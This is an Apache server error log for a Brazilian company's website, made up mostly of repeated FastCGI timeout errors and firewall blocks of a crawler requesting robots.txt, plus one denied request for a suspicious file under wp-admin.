[Sun Mar 15 09:23:48.957359 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.244.31:59820] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abak1Jqj1wV0Si-OkedDqQAAABE"]
[Sun Mar 15 09:23:55.069811 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43916] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:24:16.133813 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:44138] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:24:37.125780 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44398] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:24:58.121799 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44622] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:25:19.121770 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:44822] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:25:37.118485 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.228.16:33662] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abalQdSswJuvopo3lOjOqwAAAII"]
[Sun Mar 15 09:25:40.117504 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45016] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:26:01.133792 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45320] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:26:22.133792 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:45588] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:26:43.133889 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45826] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:27:05.137771 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46020] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:27:26.154032 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46234] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:27:47.133785 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46486] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:28:09.253772 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46760] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:28:31.985861 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46992] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:28:54.133795 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:29:10.532863 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.244.31:40348] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abamFnbQATo66fKoS7yvqAAAAMw"]
[Sun Mar 15 09:29:16.131416 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47524] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:29:37.137754 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47780] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:29:58.125818 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48132] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:30:19.133853 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48404] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:30:40.099610 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48684] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:30:44.430874 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.228.16:58492] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abamdJqj1wV0Si-OkedFFgAAAAQ"]
[Sun Mar 15 09:31:01.153801 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:49060] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:31:22.129800 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49318] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:31:43.141851 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49596] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:32:04.125783 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49872] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:32:25.073805 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:32:46.143449 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50736] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:33:07.057929 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51196] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:33:29.071067 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51426] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:33:50.133799 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51770] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:34:12.033820 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52098] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:34:14.608921 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.244.31:52834] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abanRtSswJuvopo3lOjP9gAAAIw"]
[Sun Mar 15 09:34:33.057863 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52326] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:34:54.121793 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52592] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:35:15.150091 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52874] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:35:37.129840 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53152] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:35:59.129792 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:53510] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:36:06.527996 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.228.16:34878] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abanttSswJuvopo3lOjQSwAAAIY"]
[Sun Mar 15 09:36:21.125775 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53738] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:36:42.137811 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:54054] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:37:03.153855 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54390] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:37:24.129794 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54586] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:37:45.125832 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54824] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:38:06.133788 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55050] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:38:27.136897 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55266] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:38:48.149802 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55542] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:39:09.150879 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55814] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:39:31.141793 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56144] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:39:39.034919 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.244.31:34126] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaoi7ABkC4fWIHEf8FWeQAAAFE"]
[Sun Mar 15 09:39:52.137846 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56398] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:40:13.126081 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56648] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:40:34.137767 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56988] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:40:59.646502 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57280] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:41:12.618554 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.228.16:55268] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abao6Jqj1wV0Si-OkedG6QAAAAo"]
[Sun Mar 15 09:41:23.109625 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57600] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:41:45.128251 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57950] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:42:06.115422 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58252] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:42:27.121857 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:58536] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:42:48.125781 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58868] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:43:09.121780 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59164] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:43:31.125809 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59470] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:43:52.776990 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59722] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:44:14.137797 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59982] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:44:36.151837 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60308] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:44:46.279612 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.244.31:58864] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abapvpqj1wV0Si-OkedHawAAAA0"]
[Sun Mar 15 09:44:57.057868 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60558] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:45:18.119373 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60746] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:45:39.102973 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:32806] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:46:01.135879 2026] [proxy_fcgi:error] [pid 21946:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33050] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:46:22.117773 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33250] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:46:34.880221 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.228.16:33098] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abaqKnbQATo66fKoS7yyKAAAAME"]
[Sun Mar 15 09:46:43.133796 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33490] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:47:04.053871 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33770] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:47:25.129825 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33958] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:47:46.121862 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34228] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:48:07.146960 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34508] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:48:28.123104 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34736] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:48:50.129910 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35092] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:49:11.137856 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35390] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:49:32.129802 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35624] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:49:54.125793 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35922] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:50:13.600131 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.244.31:51152] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abarBXjZBu2q05ozVU_BmAAAAVQ"]
[Sun Mar 15 09:50:15.137878 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36142] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:50:37.398017 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36352] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:50:59.086076 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36626] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:51:20.129058 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36860] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:51:26.578405 2026] [access_compat:error] [pid 21805:tid 140411691570944] [client 20.17.162.97:35510] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/index.php5, referer: binance.com
[Sun Mar 15 09:51:37.613325 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.228.16:37006] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abarWZqj1wV0Si-OkedIUQAAABU"]
[Sun Mar 15 09:51:41.129930 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37078] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:52:02.141816 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37340] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:52:23.101860 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37556] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:52:44.045805 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37836] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:53:05.065841 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38094] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:53:26.139201 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38316] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:53:47.129802 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38534] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:54:09.141795 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:38812] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:54:30.128012 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39018] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:54:51.137816 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39228] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:55:13.052409 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:39460] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:55:35.121806 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39704] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:55:56.125817 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40004] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:56:17.121008 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40222] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:56:22.003775 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.244.31:45298] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abasdtSswJuvopo3lOjTKwAAAJI"]
[Sun Mar 15 09:56:38.125906 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40478] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:56:59.061828 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40692] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:57:20.128580 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40906] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:57:41.061944 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41146] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:58:02.045830 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41474] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:58:23.129129 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41686] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:58:44.129795 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41902] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:59:06.125831 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42198] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:59:27.129897 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42418] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 09:59:48.125869 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:42718] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:00:09.033981 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42972] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:00:31.133812 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43200] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:00:52.127344 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43544] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:01:13.133828 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43840] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:01:34.129170 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:44132] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:01:56.105893 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:44450] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:02:17.131918 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:44730] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:02:38.129846 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45084] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:02:59.121916 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45370] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:03:20.118393 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45656] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:03:41.033860 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45984] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:04:03.121811 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46254] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:04:25.141847 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46546] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:04:46.045953 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46908] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:05:07.137789 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47162] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 10:05:28.109800 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47422] AH01075: Error dispatching request to : (polling)
